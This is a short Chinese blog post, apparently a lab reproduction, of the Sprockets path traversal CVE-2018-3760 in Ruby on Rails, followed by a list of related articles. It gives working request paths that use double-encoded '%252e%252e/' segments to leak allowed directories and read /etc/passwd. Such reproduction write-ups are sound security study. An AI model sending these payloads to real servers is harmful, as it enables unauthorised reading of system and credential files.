Ruby On Rails 路径遍历漏洞(CVE-2018-3760)

最新推荐文章于 2024-07-22 15:47:19 发布
最新推荐文章于 2024-07-22 15:47:19 发布
阅读量223 收藏
点赞数 7
分类专栏: # 目录穿越/遍历 文章标签: ruby on rails 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140538959
版权

一、漏洞概述

Ruby On Rails 是著名的 Ruby Web 开发框架,它在开发环境中使用 Sprockets 作为静态文件服务器。Sprockets 是一个编译和分发静态资源文件的 Ruby 库。Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞。攻击者可以%252e%252e/用来访问根目录并读取或执行目标服务器上的任何文件,../第一次转码:%2E%2E/,因为%也要进行二次编码,第二次编码就是:%252e%252e/。

二、影响范围

Sprockets < 3.7.1

三、访问页面

四、漏洞复现

1、/assets/file:%2f%2f/etc/passwd访问此路径,可得允许访问的路径白名单

2、构造payload访问,获取passwd文件

/assets/file:%2F%2F/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

风中追风-fzzf
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-3760漏洞复现(任意文件读取)
千寻的博客
01-07 4075
CVE-2018-3760漏洞复现(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
Ruby On Rails路径遍历漏洞 CVE-2018-3760 漏洞复现
ADummy的博客
03-01 511
Ruby On Rails路径遍历漏洞CVE-2018-3760) by ADummy 0x00利用路线 ​ 通过报错获取允许目录的列表—>通过允许的目录绕过访问任意文件 0x01漏洞介绍 ​ Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 Sprockets 3.7.1及更低版本中的辅助解码导致路径穿越漏洞。攻击者可以%252e%252e/用来访问根目录
Ruby On Rails 路径穿越漏洞CVE-2018-3760
weixin_46801402的博客
11-02 382
Ruby On Rails 路径穿越漏洞CVE-2018-3760
Ruby On Rails漏洞CVE-2018-3760
weixin_47493074的博客
09-16 305
Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。
Ruby On Rails漏洞复现(CVE-2018-3760) --目录穿越
小白鸽
07-31 304
背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。 利用方法 版本 <=Sprockets 3.7.1 利用手法 %252e%252e/ 不断返回上级目录 靶场 解题思路 1.用http:/
CVE-2018-3760漏洞复现(墨者靶场)
2301_78136321的博客
12-06 142
这里用的是墨者靶场的环境1.打开环境可以看到出现这样的网页下面给出了提示,这里的漏洞Ruby的任意文件读取的漏洞
Rails-doubletap-RCE:使用路径遍历CVE-2019-5418)和Ruby对象反序列化(CVE-2019-5420)的Rails 5.2.2上的RCE
02-06
使用路径遍历CVE-2019-5418)和Ruby对象反序列化的RCE on Rails 5.2.2(CVE-2019-5420) 技术分析: CVE-2019-5418- CVE-2019-5420- //hackerone.com/reports/473888 安全部门: CVE-2019-5418- //groups....
CVE-2018-1111:CVE-2018-1111 DynoRoot
05-18
CVE-2018-1111,被称为 DynoRoot,是一个针对 Ruby on Rails 应用程序的安全漏洞,该漏洞2018年被发现并公开。Ruby on Rails 是一个流行的开源 Web 开发框架,以其高效、简洁和灵活的代码结构深受开发者喜爱。然而...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞分配了CVE标识符CVE-2020-8163。 受影响的版本:rails <5.0.1不受影响:不允许用户控制本地名称的应用程序。 ...
rubynostrilhos:关于Ruby on Rails的博客(pt-br)
02-04
【描述】"Ruby Nos Trilhos"表明这是一个帮助开发者沿着Ruby on Rails的学习路径前进的项目。"Esse é o repositório do blog"揭示了这是一个使用版本控制系统(如Git)管理的博客源代码仓库。通过阅读和分析这个...
CVE-2019-5418:CVE-2019-5418-Ruby on Rails上的文件内容披露
02-05
CVE-2019-5418是一个文件内容披露漏洞,存在于Ruby on Rails 5.0.x、5.1.x和5.2.x版本中。主要原因是Rails的ActionDispatch组件在处理某些URL时,未能正确验证和限制文件路径的访问。攻击者可以通过构造特殊的URL...
使用puma部署ruby on rails的记录
yagas的专栏
07-22 373
使用puma在生产环境中配置Ruby On Rails项目。
Vue 3 和 SpringBoot 实现文件分片上传示例
exlink2012的专栏
07-22 272
实现分片上传,并使用Spring Boot在后端保存文件。前端将文件分片并逐个上传到后端后端接收到所有分片后再进行合并,最终保存为一个完整文件。
Nginx 怎样处理请求的重试机制?
技术笔记
07-22 632
Nginx 的重试机制就像是网络世界中的一道坚固防线,它在请求遇到挫折时挺身而出,为请求的成功送达保驾护航。通过合理的配置和优化,我们可以让 Nginx 的重试机制更好地适应各种复杂的网络环境和业务需求,为用户提供更加稳定、可靠的服务。就如同在人生的道路上,我们难免会遇到挫折和失败,但只要我们不放弃,不断尝试,总会迎来成功的曙光。Nginx 的重试机制也是如此,它在网络的海洋中不断探索、重试,只为将每一个请求安全、准确地送达目的地。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!
el-upload 上传图片转成base64 字符串,传给后端,且base64在页面的展示
bigdargon的博客
07-22 154
【代码】el-upload 上传图片转成base64 字符串,传给后端,且base64在页面的展示。
好用的接口文档swagger
qq_62791684的博客
07-20 358
本篇文章记录怎么给我们的后端项目整一个好用的接口文档swagger
介绍下项目的架构
weixin_44867191的博客
07-19 617
面试官想考察面试者对项目的理解程度,不是简单的点点点,对系统有一定的理解,如果不理解架构,不清楚系统之间的交互,会遗漏一些测试点,比如两个模块之间是通过MQ交互的,那就要考虑到MQ的弊端,生产者和消费者之间的数据不一致的问题,这个时候有没有xxljob的补偿机制等等。项目概述:技术栈:系统架构:模块划分:数据流:关键组件:安全性:可扩展性和维护性:部署和监控:假设你是一个电商平台的软件测试工程师,可以这样介绍项目的架构:项目概述: “我们正在开发的是一个在线电商平台,目标是为用户提供一个便捷、安全的购物体验
vscode调试nextjs前端后端程序、nextjs api接口
最新发布
lingliu0824的博客
07-22 266
最近有一个项目使用了nextjs框架,并且使用nextjs同时实现了前后端,由于之前前后端都是分离的,前端的调试可以通过在代码种添加debugger或者直接在浏览器中打断点实现,现在想调试后端接口,前面的方式就不适用了。故研究了如何适用vscode在本地调试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值